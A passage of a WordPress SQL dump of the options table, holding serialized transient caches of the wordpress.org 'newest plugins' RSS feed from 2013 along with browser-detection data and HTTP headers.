\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"World Mosques\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://wordpress.org/plugins/world-mosques/#post-60142\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 15:20:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60142@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:145:\"Offers a nice way to spice up your website&#039;s sidebar by displaying an image of a randomly selected Mosque along with its brief introduction.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"Nasiruddin Khan Amir\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Custom Error Pages\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/plugins/custom-error-pages/#post-59882\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2013 17:15:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59882@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"Create custom 401 and 403 error pages with any WordPress theme without writing a single line of code, set it up and forget it.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Jesin A\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"bbPress: Auto Delete Spam Replies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"http://wordpress.org/plugins/bbpress-auto-delete-spam-replies/#post-59972\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 18:38:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59972@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"Automatically delete bbPress spam replies older than X days.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Hudson Atwell\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Cream6 Admin Theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/plugins/cream6-admin-theme/#post-60133\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 10:26:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60133@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"A user-friendly admin theme. Responsive as far as CSS can manage on the core.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"SimonEbeling\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"M Retina Gravatars\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/plugins/m-retina-gravatars/#post-59948\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 21:50:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59948@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Show retina avatars\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"magadanski_uchen\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Monetize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://wordpress.org/plugins/monetize/#post-60146\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 19:33:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60146@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"Monetize is pay per click (PPC) ad units management system allowing you to monetize your WordPress blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Marko-M\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Quote of the Day and Random Quote\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"http://wordpress.org/plugins/quote-of-the-day-and-random-quote/#post-60140\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 14:22:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60140@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"This plugins shows the &#039;Quote of the Day&#039; or a &#039;Random Quote&#039; from WeLoveQuotes.net.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"dailyverses\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mage Reviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"http://wordpress.org/plugins/mage-reviews/#post-59936\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 14:13:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59936@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"A simple, 5 Star, rating option will be integrated within the comment form and rating average with shortcodes.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Maximilian Ruthe\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:41:\"http://wordpress.org/plugins/rss/view/new\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 03 Nov 2013 08:53:23 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:7:\"expires\";s:29:\"Sun, 03 Nov 2013 09:00:40 GMT\";s:13:\"cache-control\";s:0:\"\";s:6:\"pragma\";s:0:\"\";s:13:\"last-modified\";s:31:\"Sun, 03 Nov 2013 08:25:40 +0000\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20131101083921\";}', 'no'),
(2824, '_site_transient_timeout_browser_ec51a1ccb6bcf87a32ce8d233dc9ffce', '1383488494', 'yes'),
(2825, '_site_transient_browser_ec51a1ccb6bcf87a32ce8d233dc9ffce', 'a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Safari\";s:7:\"version\";s:5:\"6.0.5\";s:10:\"update_url\";s:28:\"http://www.apple.com/safari/\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/safari.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/safari.png\";s:15:\"current_version\";s:1:\"5\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}', 'yes'),
(2846, '_transient_timeout_feed_57bc725ad6568758915363af670fd8bc', '1382926899', 'no');
INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(2847, '_transient_feed_57bc725ad6568758915363af670fd8bc', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n	\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress Plugins » View: Newest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://wordpress.org/plugins/browse/new/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress Plugins » View: Newest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 27 Oct 2013 14:21:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:15:{i:0;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Curiyo Links\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"http://wordpress.org/plugins/curiyo-links/#post-59706\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 22 Oct 2013 13:54:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59706@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"Curiyo links important words on a page to concise information from quality sites.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Curiyo\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"strshuffle\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://wordpress.org/plugins/strshuffle/#post-59656\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 20 Oct 2013 14:54:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59656@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"A simple shortcode to shuffle the chars in a string. (See str_shuffle)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"max.doom\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Background Update Tester\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"http://wordpress.org/plugins/background-update-tester/#post-59879\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2013 16:40:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59879@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:142:\"Most sites are able to apply updates in the background. Background Update Tester checks your site for compatibility and explains any problems.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"PMID Citation with Read\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"http://wordpress.org/plugins/pmid-citations-with-read/#post-59665\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 21 Oct 2013 04:56:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59665@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"This plugin allows you to add PubMed citations to wordpress sites with deep integration to the Read by QxMD 